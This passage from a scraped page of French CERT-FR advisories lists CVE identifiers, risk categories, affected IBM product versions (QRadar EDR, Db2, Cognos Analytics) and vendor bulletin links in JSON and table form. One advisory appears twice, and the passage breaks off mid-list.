"url": "https://www.cve.org/CVERecord?id=CVE-2024-45641"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2025-21587",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21587"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2025-30698",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30698"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2023-33861",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-33861"
},
{
"name": "CVE-2025-27363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27363"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0452",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-05-23T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-05-21",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7234068",
"url": "https://www.ibm.com/support/pages/node/7234068"
},
{
"published_at": "2025-05-16",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7233442",
"url": "https://www.ibm.com/support/pages/node/7233442"
},
{
"published_at": "2025-05-20",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7233972",
"url": "https://www.ibm.com/support/pages/node/7233972"
},
{
"published_at": "2025-05-20",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7234028",
"url": "https://www.ibm.com/support/pages/node/7234028"
}
]
}
CERTFR-2025-AVI-0512
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Security QRadar EDR | Security QRadar EDR versions antérieures à 3.12.16 | ||
| IBM | Db2 | Db2 versions antérieures à 5.2.0 pour Cloud Pak for Data | ||
| IBM | Cognos Analytics | Cognos Analytics versions 12.0.x antérieures à 12.0.4 FP1 | ||
| IBM | Cognos Analytics | Cognos Analytics versions 11.2.x antérieures à 11.2.4 IF4 | ||
| IBM | Db2 Warehouse | Db2 warehouse versions antérieures à 5.2.0 pour Cloud Pak for Data |
References
| Title | Publication Time | Tags | |||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Security QRadar EDR versions ant\u00e9rieures \u00e0 3.12.16",
"product": {
"name": "Security QRadar EDR",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 versions ant\u00e9rieures \u00e0 5.2.0 pour Cloud Pak for Data",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Analytics versions 12.0.x ant\u00e9rieures \u00e0 12.0.4 FP1",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Analytics versions 11.2.x ant\u00e9rieures \u00e0 11.2.4 IF4",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 warehouse versions ant\u00e9rieures \u00e0 5.2.0 pour Cloud Pak for Data",
"product": {
"name": "Db2 Warehouse",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-0917",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0917"
},
{
"name": "CVE-2018-19361",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-19361"
},
{
"name": "CVE-2023-29483",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29483"
},
{
"name": "CVE-2021-33036",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33036"
},
{
"name": "CVE-2019-17267",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17267"
},
{
"name": "CVE-2024-22201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22201"
},
{
"name": "CVE-2025-27516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27516"
},
{
"name": "CVE-2018-14719",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14719"
},
{
"name": "CVE-2020-9546",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9546"
},
{
"name": "CVE-2024-28757",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28757"
},
{
"name": "CVE-2025-47944",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47944"
},
{
"name": "CVE-2024-12797",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12797"
},
{
"name": "CVE-2025-30065",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30065"
},
{
"name": "CVE-2025-27219",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27219"
},
{
"name": "CVE-2024-25638",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25638"
},
{
"name": "CVE-2023-45853",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45853"
},
{
"name": "CVE-2017-9047",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-9047"
},
{
"name": "CVE-2020-9548",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9548"
},
{
"name": "CVE-2023-45288",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45288"
},
{
"name": "CVE-2023-45178",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45178"
},
{
"name": "CVE-2024-47076",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47076"
},
{
"name": "CVE-2024-47177",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47177"
},
{
"name": "CVE-2022-30635",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30635"
},
{
"name": "CVE-2022-26612",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26612"
},
{
"name": "CVE-2024-56171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56171"
},
{
"name": "CVE-2024-1975",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1975"
},
{
"name": "CVE-2024-47561",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47561"
},
{
"name": "CVE-2019-16942",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16942"
},
{
"name": "CVE-2024-31881",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-31881"
},
{
"name": "CVE-2020-9547",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9547"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2018-14718",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14718"
},
{
"name": "CVE-2025-0923",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0923"
},
{
"name": "CVE-2024-29857",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29857"
},
{
"name": "CVE-2018-19360",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-19360"
},
{
"name": "CVE-2024-1737",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1737"
},
{
"name": "CVE-2024-31880",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-31880"
},
{
"name": "CVE-2024-29025",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29025"
},
{
"name": "CVE-2019-16335",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16335"
},
{
"name": "CVE-2024-28762",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28762"
},
{
"name": "CVE-2018-7489",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-7489"
},
{
"name": "CVE-2019-14893",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14893"
},
{
"name": "CVE-2023-50298",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50298"
},
{
"name": "CVE-2024-26308",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26308"
},
{
"name": "CVE-2024-53197",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53197"
},
{
"name": "CVE-2025-43859",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43859"
},
{
"name": "CVE-2024-30172",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30172"
},
{
"name": "CVE-2024-51744",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51744"
},
{
"name": "CVE-2024-45338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45338"
},
{
"name": "CVE-2024-23454",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23454"
},
{
"name": "CVE-2022-3510",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3510"
},
{
"name": "CVE-2022-3509",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3509"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2024-21634",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21634"
},
{
"name": "CVE-2024-29131",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29131"
},
{
"name": "CVE-2024-37529",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37529"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2021-25642",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-25642"
},
{
"name": "CVE-2024-53382",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53382"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2023-39410",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39410"
},
{
"name": "CVE-2024-25710",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25710"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2020-9492",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9492"
},
{
"name": "CVE-2025-27220",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27220"
},
{
"name": "CVE-2024-29133",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29133"
},
{
"name": "CVE-2019-16943",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16943"
},
{
"name": "CVE-2024-12905",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12905"
},
{
"name": "CVE-2024-41946",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41946"
},
{
"name": "CVE-2024-52046",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52046"
},
{
"name": "CVE-2021-37404",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37404"
},
{
"name": "CVE-2025-47935",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47935"
},
{
"name": "CVE-2017-7525",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7525"
},
{
"name": "CVE-2019-20330",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20330"
},
{
"name": "CVE-2023-44981",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44981"
},
{
"name": "CVE-2024-34156",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34156"
},
{
"name": "CVE-2019-17531",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17531"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2023-52428",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52428"
},
{
"name": "CVE-2024-25062",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25062"
},
{
"name": "CVE-2020-8840",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-8840"
},
{
"name": "CVE-2024-10963",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10963"
},
{
"name": "CVE-2024-57965",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57965"
},
{
"name": "CVE-2023-29267",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29267"
},
{
"name": "CVE-2024-31882",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-31882"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
"name": "CVE-2024-4603",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-4603"
},
{
"name": "CVE-2025-25193",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25193"
},
{
"name": "CVE-2018-14720",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14720"
},
{
"name": "CVE-2024-47176",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47176"
},
{
"name": "CVE-2025-22870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22870"
},
{
"name": "CVE-2024-30171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30171"
},
{
"name": "CVE-2023-52922",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52922"
},
{
"name": "CVE-2019-14540",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14540"
},
{
"name": "CVE-2025-27789",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27789"
},
{
"name": "CVE-2024-6827",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6827"
},
{
"name": "CVE-2018-14721",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14721"
},
{
"name": "CVE-2018-11307",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-11307"
},
{
"name": "CVE-2024-3651",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3651"
},
{
"name": "CVE-2025-27363",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27363"
},
{
"name": "CVE-2022-42969",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-42969"
},
{
"name": "CVE-2025-24928",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24928"
},
{
"name": "CVE-2024-41091",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41091"
},
{
"name": "CVE-2024-35152",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35152"
},
{
"name": "CVE-2019-14379",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14379"
},
{
"name": "CVE-2025-25032",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-25032"
},
{
"name": "CVE-2023-42282",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-42282"
},
{
"name": "CVE-2025-30204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30204"
},
{
"name": "CVE-2022-3171",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3171"
},
{
"name": "CVE-2024-47175",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47175"
},
{
"name": "CVE-2024-41123",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41123"
},
{
"name": "CVE-2023-39663",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39663"
},
{
"name": "CVE-2024-35136",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35136"
},
{
"name": "CVE-2022-25168",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-25168"
},
{
"name": "CVE-2024-49761",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-49761"
},
{
"name": "CVE-2024-6345",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-6345"
},
{
"name": "CVE-2019-14892",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14892"
}
],
"links": [],
"reference": "CERTFR-2025-AVI-0512",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2025-06-13T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Non sp\u00e9cifi\u00e9 par l\u0027\u00e9diteur"
},
{
"description": "Falsification de requ\u00eates c\u00f4t\u00e9 serveur (SSRF)"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits IBM. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer une ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0 distance et une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es.",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits IBM",
"vendor_advisories": [
{
"published_at": "2025-06-12",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7236500",
"url": "https://www.ibm.com/support/pages/node/7236500"
},
{
"published_at": "2025-06-11",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7234674",
"url": "https://www.ibm.com/support/pages/node/7234674"
},
{
"published_at": "2025-06-11",
"title": "Bulletin de s\u00e9curit\u00e9 IBM 7236354",
"url": "https://www.ibm.com/support/pages/node/7236354"
}
]
}
CERTFR-2025-AVI-0512
Vulnerability from certfr_avis - Published: - Updated:
De multiples vulnérabilités ont été découvertes dans les produits IBM. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, un déni de service à distance et une atteinte à la confidentialité des données.
Solutions
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
Impacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| IBM | Security QRadar EDR | Security QRadar EDR versions antérieures à 3.12.16 | ||
| IBM | Db2 | Db2 versions antérieures à 5.2.0 pour Cloud Pak for Data | ||
| IBM | Cognos Analytics | Cognos Analytics versions 12.0.x antérieures à 12.0.4 FP1 | ||
| IBM | Cognos Analytics | Cognos Analytics versions 11.2.x antérieures à 11.2.4 IF4 | ||
| IBM | Db2 Warehouse | Db2 warehouse versions antérieures à 5.2.0 pour Cloud Pak for Data |
References
| Title | Publication Time | Tags | |||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Security QRadar EDR versions ant\u00e9rieures \u00e0 3.12.16",
"product": {
"name": "Security QRadar EDR",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 versions ant\u00e9rieures \u00e0 5.2.0 pour Cloud Pak for Data",
"product": {
"name": "Db2",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Analytics versions 12.0.x ant\u00e9rieures \u00e0 12.0.4 FP1",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Cognos Analytics versions 11.2.x ant\u00e9rieures \u00e0 11.2.4 IF4",
"product": {
"name": "Cognos Analytics",
"vendor": {
"name": "IBM",
"scada": false
}
}
},
{
"description": "Db2 warehouse versions ant\u00e9rieures \u00e0 5.2.0 pour Cloud Pak for Data",
"product": {
"name": "Db2 Warehouse",
"vendor": {
"name": "IBM",
"scada": false
}
}
}
],
"affected_systems_content": "",
"content": "## Solutions\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des correctifs (cf. section Documentation).",
"cves": [
{
"name": "CVE-2025-0917",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0917"
},
{
"name": "CVE-2018-19361",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-19361"
},
{
"name": "CVE-2023-29483",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29483"
},
{
"name": "CVE-2021-33036",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33036"
},
{
"name": "CVE-2019-17267",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17267"
},
{
"name": "CVE-2024-22201",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-22201"
},
{
"name": "CVE-2025-27516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27516"
},
{
"name": "CVE-2018-14719",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14719"
},
{
"name": "CVE-2020-9546",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9546"
},
{
"name": "CVE-2024-28757",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28757"
},
{
"name": "CVE-2025-47944",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47944"
},
{
"name": "CVE-2024-12797",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12797"
},
{
"name": "CVE-2025-30065",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-30065"
},
{
"name": "CVE-2025-27219",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27219"
},
{
"name": "CVE-2024-25638",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25638"
},
{
"name": "CVE-2023-45853",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45853"
},
{
"name": "CVE-2017-9047",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-9047"
},
{
"name": "CVE-2020-9548",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9548"
},
{
"name": "CVE-2023-45288",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45288"
},
{
"name": "CVE-2023-45178",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-45178"
},
{
"name": "CVE-2024-47076",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47076"
},
{
"name": "CVE-2024-47177",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47177"
},
{
"name": "CVE-2022-30635",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-30635"
},
{
"name": "CVE-2022-26612",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26612"
},
{
"name": "CVE-2024-56171",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56171"
},
{
"name": "CVE-2024-1975",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1975"
},
{
"name": "CVE-2024-47561",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47561"
},
{
"name": "CVE-2019-16942",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16942"
},
{
"name": "CVE-2024-31881",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-31881"
},
{
"name": "CVE-2020-9547",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9547"
},
{
"name": "CVE-2025-24970",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-24970"
},
{
"name": "CVE-2018-14718",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-14718"
},
{
"name": "CVE-2025-0923",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0923"
},
{
"name": "CVE-2024-29857",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29857"
},
{
"name": "CVE-2018-19360",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-19360"
},
{
"name": "CVE-2024-1737",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-1737"
},
{
"name": "CVE-2024-31880",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-31880"
},
{
"name": "CVE-2024-29025",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29025"
},
{
"name": "CVE-2019-16335",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16335"
},
{
"name": "CVE-2024-28762",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-28762"
},
{
"name": "CVE-2018-7489",
"url": "https://www.cve.org/CVERecord?id=CVE-2018-7489"
},
{
"name": "CVE-2019-14893",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-14893"
},
{
"name": "CVE-2023-50298",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50298"
},
{
"name": "CVE-2024-26308",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26308"
},
{
"name": "CVE-2024-53197",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53197"
},
{
"name": "CVE-2025-43859",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-43859"
},
{
"name": "CVE-2024-30172",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-30172"
},
{
"name": "CVE-2024-51744",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-51744"
},
{
"name": "CVE-2024-45338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45338"
},
{
"name": "CVE-2024-23454",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-23454"
},
{
"name": "CVE-2022-3510",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3510"
},
{
"name": "CVE-2022-3509",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-3509"
},
{
"name": "CVE-2025-27152",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27152"
},
{
"name": "CVE-2024-21634",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-21634"
},
{
"name": "CVE-2024-29131",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29131"
},
{
"name": "CVE-2024-37529",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37529"
},
{
"name": "CVE-2025-22868",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22868"
},
{
"name": "CVE-2021-25642",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-25642"
},
{
"name": "CVE-2024-53382",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53382"
},
{
"name": "CVE-2024-45296",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45296"
},
{
"name": "CVE-2024-45337",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45337"
},
{
"name": "CVE-2023-39410",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-39410"
},
{
"name": "CVE-2024-25710",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25710"
},
{
"name": "CVE-2024-7254",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-7254"
},
{
"name": "CVE-2020-9492",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-9492"
},
{
"name": "CVE-2025-27220",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27220"
},
{
"name": "CVE-2024-29133",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-29133"
},
{
"name": "CVE-2019-16943",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-16943"
},
{
"name": "CVE-2024-12905",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12905"
},
{
"name": "CVE-2024-41946",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41946"
},
{
"name": "CVE-2024-52046",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52046"
},
{
"name": "CVE-2021-37404",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37404"
},
{
"name": "CVE-2025-47935",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47935"
},
{
"name": "CVE-2017-7525",
"url": "https://www.cve.org/CVERecord?id=CVE-2017-7525"
},
{
"name": "CVE-2019-20330",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-20330"
},
{
"name": "CVE-2023-44981",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-44981"
},
{
"name": "CVE-2024-34156",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-34156"
},
{
"name": "CVE-2019-17531",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-17531"
},
{
"name": "CVE-2024-52798",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52798"
},
{
"name": "CVE-2024-47535",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47535"
},
{
"name": "CVE-2023-52428",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52428"
},
{
"name": "CVE-2024-25062",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-25062"
},
{
"name": "CVE-2020-8840",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-8840"
},
{
"name": "CVE-2024-10963",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-10963"
},
{
"name": "CVE-2024-57965",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-57965"
},
{
"name": "CVE-2023-29267",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-29267"
},
{
"name": "CVE-2024-31882",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-31882"
},
{
"name": "CVE-2025-22869",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22869"
},
{
